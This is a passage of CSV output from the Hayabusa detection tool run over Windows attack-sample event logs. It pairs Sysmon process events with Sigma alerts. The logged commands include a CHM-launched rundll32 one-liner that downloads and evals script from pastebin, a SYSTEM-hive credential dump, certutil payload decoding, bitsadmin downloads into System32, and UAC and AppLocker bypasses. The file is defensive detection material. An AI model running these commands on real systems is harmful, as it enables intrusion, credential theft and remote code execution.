MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 
747F3D96-AE22-5D3A-0000-001096B24E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 
+09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 
| Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 
747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 
747F3D96-60F7-5D3F-0000-00106F2F5600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil 
Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | 
Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in 
CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without 